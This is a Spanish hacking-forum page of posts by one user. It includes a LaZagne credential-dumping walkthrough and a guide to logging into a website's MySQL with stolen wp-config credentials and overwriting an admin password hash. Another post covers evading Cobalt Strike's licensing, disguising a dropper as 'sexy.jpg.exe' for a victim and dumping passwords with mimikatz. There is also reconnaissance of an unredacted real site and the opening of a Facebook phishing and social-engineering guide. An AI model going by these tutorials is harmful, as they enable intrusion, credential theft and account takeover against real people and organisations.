Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BrowserNet

#81
Me presento de nuevo  8)

Buenos días ha todos me siento verdaderamente incomodo con algunos usuarios que me dicen que soy un copy paste en mis POST'S, cuando soy yo el mismo autor de la pagina No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, publico mis POST completos en el foro y por respeto NO mando solo la "URL" en un POST para que enlace a mi servidor web como "terceros", Espero comprendan eso y me suena absurdo poner créditos a algo que es completamente de mi autoria 8)

"Una cosa es aparentar lo que no es y otra cosa es ser"

Saludos!
#82
Lo mencionare "3 veces mas", deje los datos en las imagenes que me dio flojera editar y deje el blackout dando datos relacionados muy pero muy exactos hasta en shodan, google, etc , no se porque mencionar algo que ha sido mencionado varias veces xD, saludos mi hermano :P
#83
Hola bro, en mi POST de presentación mencione que soy autor de mi blog por ese motivo no pongo fuente de algo que es mio xD , Saludos hermano 8)
#84


Saludos fieles lectores en esta oportunidad les traigo una herramienta llamado "laZagne", quise hacer un post hace tiempo de este software pero no estaba convencido de añadirlo al blog, pero cuando vi que lo habían liberado en source open en python, tanto para windows y linux  me gusto la idea de compartirlo, pero de igual manera tiene una versión en código cerrado, en este caso en un ejecutable la cual es mas fácil y acta de usar en cualquier tipo de escenario ya sea remotamente en un explotación con Metasploit, comprometiendo servidores web o  mediante ing social alojándole en la maquina de la víctima.

Descarga del código abierto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga del ejecutable:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Primer escenario en Gnu/Linux - Kali Linux.

Descarga:

Código: text
root@kali:~ git clone https://github.com/AlessandroZ/LaZagne.git

Permisos y ejecución:
Código: text

root@kali:~/LaZagne/Linux/src# chmod 775 *
root@kali:~/LaZagne/Linux/src# python LaZagne.py




Como vemos nos aparecen una lista de módulos las cuales nos dice cada función

    chats         -  Ejecutar chats módulo
     mails         -  Ejecutar módulo mails
     all              -  Ejecutar todos los módulos
     database   -  Ejecutar base de datos
     wifi            -  Ejecutar
     sysadmin  -  Módulo Ejecutar sysadmin
     wallet        -  Módulo de cartera Run
     browsers   -  Ejecutar módulo de navegadores


En este primer escenario voy a ejecutar la opción browsers para ver los datos de credenciales de usuarios  y contraseñas que se han guardado:

Código: text
root@kali:~/LaZagne/Linux/src# python LaZagne.py browsers -v




En este segundo escenario ejecutare la opción sysadmin , de igual manera para encontrar las credenciales tanto administrativas del sistema, como otros complementos.
Código: text

root@kali:~/LaZagne/Linux/src# python LaZagne.py sysadmin -v




de igual manera podemos interactuar con las demás opciones, pero en este caso estoy utilizando una maquina virtual, en algunas características les pida que tengan la terminal ROOT para poder extraer datos de la memoria interna.

Segundo escenario en Windows 8.1

En este caso en la distro windows abriré CMD como administrador para poder tener permisos de algunas opciones como dije hace momentos, en este caso copiamos o subiremos nuestro archivo ejecutable laZagne.exe en el disco local C:



Como vemos nos aparecen las mismas funciones pero se añaden 3 mas, pero las pondré para que no se confundan:

    hats           -   Ejecutar chats módulo

    svn            -   Ejecutar el modulo svn

    all              -  Ejecutar todos los módulos

    wifi            -  Ejecutar módulos wifi

    mails         -  Ejecutar módulo mails

    windows   -  Ejecutar ventada de módulos

    database   -  Ejecutar base de datos   

    sysadmin  - Módulo Ejecutar sysadmin

    wallet        - Módulo de juegos

    browsers   - Ejecutar módulo de navegadores



Entonces utilizare la opción windows para ver los módulos del sistema que  pasaran a ser extraídos.



como hemos observado hemos dumpeado los datos  de usuario del sistema con su respectivo HASH

Ya que aquí tengo montado la conexión WIFI escogeré el modulo wifi:



Espero les aya gustado este POST, como siempre espero hallan aprendido algo nuevo este día.
Un saludo para todos!!
#85
Hacking / Connect Remote MySQL Web Owned
Mayo 22, 2016, 11:52:36 PM


Buenas noches hermanos de underc0de en esta oportunidad les ensañare una técnica de conexión remota a la base de datos de servidores para editar dichas consultas o sentencias de algunos datos de las columnas  especialmente contraseñas de usuario.

Antes de comenzar con el POST, deseo aclarar que existen varios tipos de métodos para obtener las credenciales de las base de datos tales como el "Symlinking", "Full-Path-disclure",entre otros...., les dejare un video que data de hace años sobre el tema del Symlinking y otro de un Full-Path-disclure de Wordpress.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

o como cualquier método que te brinde dichas credenciales, en mi caso un buen amigo ayer me envió un Full-Path-disclure de Wodpress de una web importante en su país, pero no sabia como conectarse al servidor e interactuar con la base de datos del servidor, la cual amablemente le enseñe el método y aproveche para elaborar el siguiente post.

../wp-config.php -----------------------> como sabemos este archivo es el iniciador de la instalación y configuración estructurado de un servidor en Worpress, la cual siempre esta vigente en los modulos principales de un sitio web, pero no puede ser visible por los permisos administrativos ,pero algunas veces se encuentran fallos en algunos complementos o plugins que comprometan tal servicio y nos permita ver o descargar dicho archivo con las credenciales como ejemplo:



Las cuales estas fueron las credenciales del servidor enlazado, las lineas negras son los datos del servicio que esta asiendo la prueba de concepto la cual NO muestro por seguridad de dicho servidor, las lineas azules son las credenciales MySQL del servidor que necesitamos para conectarnos,
la cual añadiremos imaginariamente que la DB_PASSWORD es :pepito y el DB_HOST es : 192.168.1.39' - puede ser una IP o un servidor DNS.

Entonces hipotéticamente serán así:

DB_USER 'root'
DB_PASSWORD: 'pepito'
DB_HOST           : 'sitioweb.east-1.amazonaws.com'

( Ojo el DB_USER 'root' es verdadero), entonces obtenido lo siguiente abriremos la siguiente linea en la terminal para conectarnos a dicho servidor.

Código: text
mysql -h sitioweb.east-1.amazonaws.com -u root -p pepito

para dar una explicación de lo siguiente -h es la variable donde asignaremos la URL -u las credenciales usuario y contraseña separado con una - para añadir la contraseña root -p pepito

al añadir lo siguiente tendremos acceso al servidor Mysql como vemos en la siguiente imagen:



Una ves adentro tendremos que manejar algo se sintaxis para realizar consultas, para ello si deseamos ver que base de datos tiene dicho servidor añadiremos el siguiente comando:

show databases;




Como vemos ya hemos obtenido las bases de datos del servidor, en mi caso entrare a la principal que es la que esta con la linea azul, la cual la llamaremos "basedatosweb", ahora debemos añadir el siguiente comando.

Código: text
use basedatosweb
show tables;

como vemos la variable use es para elegir la base de datos en este caso: basedatosweb y show tables; para ver las tablas que tiene dicha DB.



y así sucesivamente podemos obtener datos del servidor lo que haré ahora sera interactuar con las sentencias y consultas de la base de datos para modificar las contraseñas en ves de andar "Crackeandolas" para  no perder el tiempo en la penetración del panel administrativo, para ellos utilizaremos la sentencia muy conocida para entrar a las tablas y obtener sus datos.



ahora tenemos en tela de juicio las credenciales de dichos servidores verdad, y ahora voy asignarle una contraseña a un usuario que esta en dicha columna mediante consultas, en si hay 2 usuarios uno es que tiene privilegios y el otro no la cual los llamaremos "jose" y el otro "maria".

Usuario sin privilegios : jose
Usuario con privilegios: maria

Lo primero que debemos hacer es crear una HASH en cualquier formato sin tecnicismos voy a crear una con la asignación "password" en MD5.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Como vemos la palabra "password" es md5  es:

5f4dcc3b5aa765d61d8327deb882cf99


update wp_users set user_pass='5f4dcc3b5aa765d61d8327deb882cf99' where user_login='maria';




Como vemos la sintaxis es correcta y hemos podido modificar la contraseña, si lo ejecutan mal una variable les saldrá un Warning como aparecen en las bug de SQL. comprobaremos si hemos cambiando entrando al panel.



Gracias por leer este POST'S,  no olvides dejar tu comentario y agradecer que no cuesta nada, Saludos  ;D
#86
Dudas y pedidos generales / Re:Ayuda para iniciar
Mayo 22, 2016, 08:27:27 PM
Hola, puedes iniciarte leyendo artículos en en este foro de todos los usuarios de esta comunidad o visitando paginas que se especializan en dar información de todos los niveles, te dejare mi blog donde aprenderás varios métodos : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Blog de algunos compañeros:

El blog del foro: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El blog de Antrax: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El blog de Snifer@L4b's: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El blog de Arthusu: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El blog del chema: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un 3 consejos que el chema dijo:

Para iniciarse en la seguridad Informatica & Hacking, hay 3 pasos fundamentales:

1 - Leer mucho
2 - Practicar bastante
3 - Ser constante

Vídeo completo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos y Éxitos bro!!
#87


Saludos mis fieles lectores en esta oportunidad no les traigo un tutorial, pero si una lista de aplicaciones Android para el manejo de Pentesting y anonimato que les servirá mucho para sus auditorias en sus celulares inteligentes la cuales no consumen muchos recursos y son fácil de manejar, espero les sirva demasiado porque todos ellos fueron probados por mi persona

Pero antes de todo necesitan Rootear su dispositivo movil, ya que algunas herramientas necesitan privilegios ROOT, pero como siempre me gusta dejar todo completo en un POST les recomiendo esta aplicación que para mi es la mejor.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para comprobar si tu dispositivo esta rooteado.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Anonimato:

como bien sabemos el tema del anonimato en la red es vital para ocultarnos de algunos riesgos que se puede tener al entrar a un sitio web desconocido es mas, aun en paginas conocidas  existen scripts malintencionados que pueden afectar al usuario como lo conocemos.

La primera categoría sera sobre el Anonimato de red o mas conocido el cambio de IP a otro ISP de un país.

TunnelBear VPN




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hotspot Shield



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

CyberGhost




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Orweb




OpenVPN




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En este otro hay personas que mas que proteger su IP desean proteger sus llamadas y mensajes en un algoritmo cifrado que les brinde una comunicación encriptada sin un punto de salida, para ello les dejare lo siguiente:

RedPhone




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Signal Private Messenger



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

WickrTop Secret Messenger




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Alguna ves ha recibido mensajes de numeros extraños? que no tienen ni sentido al momento de ver los numeros 0000-0000-0008 o entre otros?, pues les presento el AIMSICD la cual hace una captura en vivo de geolocalizacion entre nuestro "espía" asiendo un escaneo de rangos de antenas de telecomunicaciones.

AIMSICD




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Herramientas de Auditorias:

Quien no les gustaría auditar desde su celular cuando no esta en su casa o esta en un cybercafee conectado a una WIFI o  a sus paquetes de datos para ahorrar y aprovechar el tiempo.

Nipper




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

WPScan



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Herramientas de Pentest website

al final de las auditorias siempre viene el lado divertido que es la penetración al sistema vulnerable, donde confirmaremos si es  penetrable o no.

Sqlmapchik




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Terminal IDE



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Herramientas de recolección de datosWIFI


Aveces cuando estamos paseando con nuestro carro o simplemente en un paseo rutinal a pie podemos notar que las señales Wifi en una cuidad nos rodean, las cuales podemos auditar su intensidad, el tipo de encriptacion y sobre todo los puntos de acceso que podamos obtener de manera automática, ya que se grabaran en nuestro celular siempre.

Wifi Analyzer



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Wigle Wifi Wardriving




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Auditorias de redes


nMapper




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fing - Network Tools




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Intercepter-NG




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Zanti - Movile Penetracion testing




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Deseas tener Backtrack - Kali Linux u otro sistema operativo GNU Movil en tu sistema android? los invito a utilizar una de las grandes herramientas que existen.

Link de Kali Linux Android:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Linux Deploy




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Complete Linux Installer




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero les aya gustado este articulo, sin mas que decir me despido de todos ustedes con un fuerte abrazo hermanos de underc0de
#88


Saludos mis hermanos de underc0de en esta oportunidad les enseñare a utilizar Cobalt Strike en su ultima versión, según el autor data que la plataforma funciona mediante post-explotación y canales encubiertos para emular una tranquila explotación a largo plazo mediante el acto integrado en la red del cliente de igual manera permite cambiar sus indicadores de red para que parezca diferentes malware cada vez.

Estas herramientas complementan el proceso de Cobalt Strike sólidamente con la mano de la ingeniería social, su capacidad de colaboración es robusta, y los informes únicos son unicamente diseñados para ayudar a la formación del equipo.

La plataforma y sus complementos estándares tienen un costo.



¿Cuánto cuesta el Cobalt Strike?


Las nuevas licencias Cobalt Strike cuestan $ 3.500 por usuario para una licencia de un año. Renovación de licencias cuestan $ 2.500 por usuario al año.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

como vemos dejemos registrarnos para bajar la licencia key de la descarga si es que nos aceptan por la restricciones y unificado solamente para EE.UU, pero hay otra manera para poder descargarla.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Pero nos dice que debemos solicitar un trial para poder adquirir la licencia y que debemos ponernos en contacto con el siguiente correo electrónico No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para solicitar un enlace de descarga directa para el PE.

Entonces podemos utilizar cualquier Proxy de anonimato con la IP de EE.UU para poder entrar al enlace de descarga de Cobalt Strike, existen muchos las cuales pueden utilizar y están en mi blog pueden buscar los artículos si lo desean, pero también existen "Proxys" que podemos utilizar mediante navegadores web mediante la configuración de red y paginas que se conectan en un proxy y cambiar nuestra IP específicamente en un servicio web pre terminado.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Ahora ya podemos acceder al formulario de descargarlo sin ningún problema o pueden descargarlo en el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El trial de Cobalt Strike 3.0 tiene una valides de 21 días para ser usado, pero como esta en un lenguaje de código abierto, la licencia se a alterado en todas las versiones anteriores de dicha herramienta la cual podemos encontrar como crackearla sin tecnicismos en la red, en mi caso creo que no hay necesidad de llevar acabo dicho procedimiento.

Configurando cobalt strike

Abriremos la terminal, extraeremos el archivo de cobalstrike y por ultimo daremos permisos de ejecución a la carpeta

Código: text
root@kali:~ tar -xvzf cobaltstrike-trial.tgz
root@kali~ cd cobaltstrike-trial
root@kali:~ chmod 775 *

Luego de ello vamos a ejecutar el archivo teamserver y añadiremos lo siguiente:

Código: text
root@kali:~/cobaltstrike3.0# ls -la
root@kali:~/cobaltstrike3.0# ./teamserver 192.168.179.135 test


como vemos al ejecutar el teamserver añado mi ip 192.168.179.135 para establecer el servidor  y añadí la palabra test para definir la contraseña de la plataforma.



como vemos en la parte del trial ya había configurado los valores de 21 días a 99999999 días, también podemos observar nuestro certificado establecido en encriptacion SHA1, ahora pasaremos a ejecutar el Cobalt Strike.

Código: text

root@kali:~/cobaltstrike3.0# ./cobaltstrike




al iniciar la herramienta nos aparece un aviso sobre el trial, ahora daremos aceptar, luego nos aparecerá un perfil del servidor, en usuario pueden añadir lo que deseen, y en password deben añadir la que pusieron al iniciar el teamserver en mi caso fue " test "



Luego de ello, nos aparece el key del servidor SSL del teamserver la cual le daremos SI para establecer la conexión a la plataforma de Cobalt strike.



Entonces ya tenemos el servidor corriendo con la plataforma con éxito



Métodos de Post-Explotación

Lo primero que haremos sera crear nuestro servidor de escucha para eso, entraremos en el icono de los "Audífonos", y le daremos clip en "ADD" y configuraremos lo siguiente:

Name: añadimos el nombre que le otorgaremos a nuestro servidor, en mi caso fue "prueba2"
Payload: dejaremos correr la conexión en "Windows" >> beacon_http >> reverse_http
Host: lo dejamos como esta, ya que es nuestra IP del servidor.
Port: nuestro puerta de escucha en mi caso lo deje en 8080.



Una ves que hallamos añadido nuestra configuración, le daremos en Save, luego de ello automáticamente nos saldrá el siguiente mensaje:



la cual nos dice que la conexión beacon HTTP  sera establecida con Cobalt Strike mediante nuestra IP, le daremos aceptar.



Como podemos notar ya tenemos nuestro servidor de escucha, ahora lo que haremos sera crear nuestro Payload en esta oportunidad lo haremos con un archivo de imagen para hacerlo mas ingenioso y muy creíble, lo que haremos sera dirigirnos a la barra de herramientas en la pestaña
"Attacks" > Packages > Windows Dropper



Luego de ello nos aparecerá el primer cuadro la cual le añadiremos el nombre de la lista, en mi caso fue prueba1, rellenamos los datos luego de ello iremos a la opción "Embedded File" le daremos en la carpeta y escogeremos una imagen en mi caso fue esta :3





Luego que hallamos generado nuestro payload lo guardaremos con mismo nombre del archivo de imagen en mi caso se llama "sexy.jpg" y lo guardamos como "sexy.jpg.exe", la cual se ubicara e la carpeta "ROOT" - Carpeta Personal, ahora que ya tenemos nuestro archivo de imagen infectado, lo enviaremos a la victima :)



Una ves que nuestro victima aya abierto la imagen, automáticamente hemos explotado su sistema y podemos controlarlo desde nuestro plataforma de Cobalt Strike



Lo que haremos sera interactuar con plataforma al estilo de armitage, pero esta tiene mejores opciones que podamos imaginar, lo que haremos primero sera darle en el icono de la victima y dar en la opción "Interact"



Luego le añadiremos el comando "help" para que nos aparezca una lista de comandos que podemos interactuar de acuerdo a nuestras necesidades.

En mi caso tecleare el comando "elevate", para establecer una conexión con el usuario administrativo del sistema mismo, nos aparecerá un cuadro la cual solamente señalamos la primera opcion y le damos "Choose"



Como vemos ya hemos explotado el sistema con la cual obtuvimos tener una sesiona con el usuario del sistema propio.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si deseamos ver y controlar la maquina de la victima podemos añadir las siguientes opciones del Explore - Desktop VNC

Explore - Desktop VNC




de igual manera pueden ver los archivos del servidor para navegar libremente y tener privilegios de ver, descargar, subir, etc pueden entrar en la opción Explore - File Browser



también podemos hacer un dump a al sistema para obtener credenciales con mimikatz para obtener tanto en texto plano como en hash, eso dependencia de los registros añadidos, en este caso me devolvió en texto plano mis credenciales de mi usuario de windows

User: Admin
Pass: Admin




De igual manera pueden crear un archivo .exe legitimo, ahora haré la prueba en un windows 8.1 que tengo como sistema propio.



Como también pueden crear archivos maliciosos en Java applet, la configuración es sencilla, solo añaden el puerto de escucha para recibir las conexiones y enviamos el link infectado a la victima.  :)





Una ves que la victima aya aceptado que corra el script ya sabemos el resultado :)



Sin mas que decir, espero halla sido de su agrado este POST y agradecer al administrador "Antrax" por querer publicar algunos de mis contenidos al blog de la comunidad underc0de, Gracias totales  8)
#89

Buenos días mis fieles lectores en esta oportunidad estuve leyendo algunos mensajes en la fan page y muchas personas me preguntaban ¿Se puede ejecutar el Proxy de Tor Browser con Burpsuite?.
Pues es verdad, si se puede establecer la conexión mediante el punto de salida al Burpsuite configurándolo.

Pueden instalar Tor en su sistema Windows sin ningún problema:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si desean instalarlo en GNU/Linux y les sale un error pueden visitar el siguiente POST para fixearlo y ejecutarlo con éxito.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una ves instalado Tor correctamente procederemos a abrirlo, en esta oportunidad haré este articulo en el sistema operativo Windows, pero de igual manera funciona en cualquier otro S.O.


Configuración

Lo primero que debemos saber es en cual puerto el servidor Tor esta recibiendo la conexión, para ello debemos entrar a Opciones > Avanzado > Red > Configuración.


Podemos ver que el tipo de proxy de nuestra conexión esta en SOCKS5  y corre con el puerto 9150;
ya que la IP 127.0.0.1 (loopback) se establece como local, entonces sabiendo el manejo de red que tiene, nos vamos al Burpsuite.

Cuando estemos en la plataforma nos dirigiremos a la sesión "Options" > Connections
en la parte donde dice "SOCKS Proxy" vamos a añadir la IP y el puerto de Tor.


Cuando hayan añadido las siguientes credenciales como verán en la siguiente imagen, le darán en el casillero "Use Socks proxy".



Una vez hecho toda la configuración nos saldrá un mensaje en el botón "Alert" donde nos avisará que la conexión se ha establecido correctamente.


Ahora nos vamos a dirigir a nuestro navegador preferido y configuraremos la red de igual manera, pero le añadiremos el puerto 8080 para captar el protocolo de red normal HTTP, en este caso lo haré con el navegador Owasp.


Como vemos, he añadido el proxy de la IP del servidor TOR, pero el puerto de escucha le añadí el 8080 para que se conecte al protocolo HTTP y poder recibir respuestas sin colarse a los nodos, entonces una ves configurado lo siguiente entraremos a un servicio web para testearlo.




Espero les haya gustado este POST, agradecer no cuesta nada. Saludos !!!
#90
Muchas gracias bro  ;D , soy nuevo en este foro y  déjeme que me  atreva ha decirle lo siguiente, pero underc0de  es uno de los mejores en habla hispana, sin duda los mejores están aquí, saludos y éxitos hermano   8)
#91
:O, jajajaja Antrax me sorprende, no te preocupes hermano por nada dije para los "NIÑOS RATAS", Saludos y éxitos  8)
#92

Saludos mis hermanos de underc0de en esta oportunidad vamos a elaborar un análisis de como se analiza un servidor web en especifico, mediante diferentes métodos en las cuales nos ayudaran a encontrar vulnerabilidades criticas que puedan ser aprovechadas para explotar un servidor, ya que muchas personas se rinden en el primer escenario.

Antes que nada vamos a centrarnos en una pagina especifica, que la llamare "www.pepito.com" pero es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ( ya que me dio mucha flojera tapar el nombre de algunas fotos y en las indexaciones aparece el nombre del servicio web UNICA, por nada deje la IP en shoudan aclarando :p )

Lo primero que se debe tener en cuenta es lo siguiente:

- Analizar la estructura mediante un escaner de vulnerabilidades


Lo primero que hace todo mundo es utilizar un escaner de vulnerabilidades. entre ellos algunos utilizan Acunetix, Vega, ProxyStrike, BurpSuite, Zaproxy, Arachni, Nessus, Nikto, etc....

Todas las herramientas mencionadas están en el blog, le dejare el siguiente articulo donde menciono algunos pasos de como puede convertirse en un auditor de seguridad.


    Auditoria plataformas web
    Auditoria de CMS (Sistema de gestión de contenidos)
    Mapeo de web mediante DNS
    Subir shell en Wordpress , phpmyadmin y defacear en Joomla
    Anonimato
    Manteniendo nuestra puerta trasera en un servidor   - Backdoor
    Auditando nuestro servidor web en busca de webshells
    Encontrando fallos mediante Google Hacking
    Explotando servidores dedicados de developers
    Denegación de servicios


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo que un usuario en windows con nivel intermedio siempre tiene como una buena opción es utilizar el escaner Acunetix, este fue el resultado que arrojo de la pagina de pepito:


entonces uno pensaría esta web es segura (Inhackeable) y si ejecuto otro escaner para a ver si me arroja mas vulnerabilidades, vamos a hacer un análisis simple con Vega que especialmente se enfoca en el análisis de vulnerabilidades.


me sale de igual manera pero con algunos fallos que se consideran mas altos, pero como todos sabemos NO todo lo que vemos es cierto, ya que un escaner puede ser mentiroso en sentido que puede mostrar falsos positivos.

Es por eso que se pueden buscar módulos o parámetros GET insertando sentencias manualmente para ver que pueden arrojar, en mi caso ejecutare un pequeño Spider que realice hace meses.


Pero una linea me pareció muy interesante la cual es: publicacion/datos2/js/



Entonces entrare a uno de esos parámetros para ver que puedo encontrar:



como vemos parece que hemos encontrado una vulnerabilidad en el servidor, que los escanners no encontraron, vamos a comprobarlo con sqlmap.



Pero sabemos que el servidor corre en un sistema GNU/Linux, lo que haremos sera hacerle un Ping para obtener la IP del servidor para realizar una búsqueda de sus puertos y servicios que corren.



Una ves obtenida la verdadera IP de manera fácil es porque el servicio web no tiene Cloudflare, pero si desean aprender como encontrar la IP verdadera lo pueden hacer con Reverseraider que es una herramienta de código abierto que nos permitirá hacer un análisis de mapeo de redes, que en su mayoría algunos servicios solo se enfocan en proteger el dominio principal, pero no en sus sub-dominios que en su totalidad comprometen al principal.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Entonces lo que vamos a ejecutar es el buscador Shodan para ver que servicios corren:



Como vemos corren 12 servicios en diferentes puertos las cuales son los siguientes:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



como vemos se puede hacer un ataque de fuerza bruta al FTP o buscar un exploit, en el servicio SMTP esta totalmente abierto sin credenciales, entre ellas también están abiertas las conexiones del Puerto de MySQL que pueden ser atacadas mediante SPARTA que es una herramienta de código abierto completa para realizar ataques a muchos de los servicios que corren en un servidor.


Entonces supongamos que un auditor novato diría no he encontrado nada, la web es 100% segura... pero algo esta mal en todo lo que vimos, la persona solamente se enfoca en el dominio principal pero no se pone a pensar si existen Sub-dominios que estén ligados al servidor, la búsqueda DNS inversa o revertir la resolución de DNS (RDN) es la determinación de un nombre de dominio que está asociado con una determinada dirección IP mediante el servicio de nombres de dominio (DNS) de Internet.

Se puede hacer una búsqueda mediante Sub-dominios manualmente mediante Bing utilizando la Dork " Domain:pepito.com "


como también pueden añadir la IP en Bing del servidor web principal:


Entonces usted podrá realizar búsquedas de parámetros utilizando google o cualquier otro buscador que indexe los servicios... y también pueden auditar de la misma manera si es que no encuentran fallos en el dominio principal o si desean encontrar mas fallas para reportarlas o lo que sea, supongamos que esa web no tiene NINGÚN FALLO pero esta alojada en su servidor de dominios de paga usted podrá hacer el mismo procedimiento elaborando un ataque dedicado a paginas que estén  en el mismo servicio para hacer ataques como symlink o rootear el servidor, un ejemplo es este video:



pero algunos cuando ya obtienen algunos credenciales de usuario no saben encontrar paneles de administrador u otros, en estos caso pueden utilizar el siguiente DORK que les ayudara mucho, pero de igual manera auditar módulos en busca de ellos:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 


como vemos yo declare en el buscador que solamente quiero buscar la palabra "Login" en el dominio pepito, pueden jugar con ello y variar las palabras como "admin", "usuario", "contraseña, etc.



Espero les haya gustado y brindado una ayuda especial para los que recién se inician en este ambiente es no confiar en su Escaner, auditen encontrando módulos y jueguen con los parámetros que para un auditor eso es diversión en el momento y trabajo adecuado.

nuevamente repito, el servidor es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, me dio mucha flojera editar y editar las imágenes para evitar burlas de los amigos que solo se dedican a criticar xD

Agradecer no cuesta nada. Saludos !
#93
Hackeando cuentas de Facebook - Mi metodología





Saludos hermano de underc0de, estuve un poco desaparecido por motivos de estudio por eso no pude redactar ningún POST para la comunidad : ( , pero como ya tengo horas libres estaré bien constante publicando, enseñando & aprendiendo nuevos métodos con ayuda de ustedes.

En esta oportunidad vamos a tocar un tema que ha muchos "Niños Ratas" les va gustar, que es el Arte de hackear cuentas de facebook por diferentes métodos o para nosotros que somos mas refinados el arte de robar credenciales de facebook xD

Métodos:

    Ingeniería Social
    Phishing
    POST Explotacion
    Backdoors
    Keyloggers
    Brute Force



Sin duda Facebook es el principal dominio de mensajería a nivel mundial utilizado por todas las clases sociales, la compañía creada por Mark Zuckerberg  ha alcanzado el agüe durante sus principios y hasta el día de hoy sigue siendo tendencia gracias a sus adaptaciones que satisfacen las necesidades de sus usuarios.



Este es el punto en donde un "Atacante" o un "Niño Rata" entra en acción, quien de nosotros en sus principios no ha querido entrar a una cuenta de Facebook de una persona que nos cae mal y cambiarle la contraseña¿? o en la mayoría de usuarios desean obtener la contraseña de sus novios(a) para ver si los están engañando

Ingeniería Social


La ingeniería social es un método que se basa desde los principios del hombre, la cual ha sido crucial  para victorias grandes en las batallas y guerras, un claro ejemplo es Helena de Troya.

Quien no ha escuchado la historia del mítico caballo de Troya en su infancia , ya sea por vídeos animados , libros, etc,
La historia se basa prácticamente en la reina Helena, este personaje es hija de un dios que en vida encarna una gran belleza pero a la vez tendría una gran maldición  que traería consecuencias muy graves y trágicas para ella , en su momento el origen de la guerra de Troya  fue una de las guerras épica de toda la historia de la humanidad, a la vez trata de una historia de amor de París y Helena, sin embargo la guerra comenzó cuando "París" secuestra a la princesa por acto de amor, y ahí juega el rol importante de personas muy conocidos en la historia , como reyes y guerreros .
La guerra se basa entre dos civilizaciones la griegas por el rey Agamenon y la troyana por el rey Priamo.

El rey Agamenon enterado de que helena fue secuestrada , manda  una flota de 1000 barcos del mar egeo en busca de helena los griegos buscaron por mas de 10 años pero no consiguieron nada , el guerrero mas privilegiado en su momento de Grecia fue Akiles  que combatió con Hector otro guerrero privilegiado de Troya en una pelea épica entre ambos guerreros, Hector sin embargo murió en la pelea  , pero las murallas de troya sigue en pie, ahí  fue cuando los Griegos construyeron un caballo de madera sobre ruedas gigante en la cual se escondieron los soltados Griegos y recurrieron al engaño , los soldados troyanos pensaron que era un regalo y metieron el caballo a la cuidad ese mismo día  mientras que los troyanos dormían los soldados griegos posteriormente aprovecharon para salir del caballo y atacar a los griegos  de la manera mas estratégica , troya cae pero su leyenda seguirá por todos los siglos.

Narre una pequeña historia , para que vean como hasta en una guerra se pudo utilizar la ingeniería social y afectar los papeles de la misma, solo jugando con la confianza de la victima.
En la informática la ingeniería social juega con rol muy importante para conseguir datos de nuestra victima por medio  de técnicas de infiltración de datos por directorios sensibles o base de datos, para luego obtener datos de la victima que nos permita tener una comunicación con ella, para luego obtener datos físicos y posteriormente para nuestro beneficio malicioso

"El método consiste en engañar a la victima mediante la "Palabra o el acto"

En nuestro escenario la Ing. social debe jugar un rol importante acompañado de algunos métodos, entre ellos el conocido "Phishing"



El Phishing consiste en crear una pagina web falsa(Clonada), que tenga la misma caracterizara que una pagina oficial en este caso "Facebook", luego enviarla a nuestra victima, para que añada sus credenciales y obtener los datos del usuario.

Ejemplo:

Victima  - Maria
Atacante - Browser

Maria es Fans de Justin bieber, le gusta la musica POP y le encanta ver videos coreanos.

Yo, lo primero que haré sera estudiar detalladamente a mi victima, lo que haría seria ganándome su confianza poco a poco, comenzando con el "Hola" y así consecutivamente hablando de lo que mas le gusta. Hasta llegar al punto necesario de tener nuestro "Phishing" subido a un servidor y decirle lo siguiente:

Maria he encontrado un grupo privado de facebook de Justin bieber, donde regalan todo tipo de discos originales y que también tenemos "Videocamp" con nuestro ídolo.

¿Deseas que te envié el link?

¿Díganme quien joven o señorita rechazaría tal comentario? 


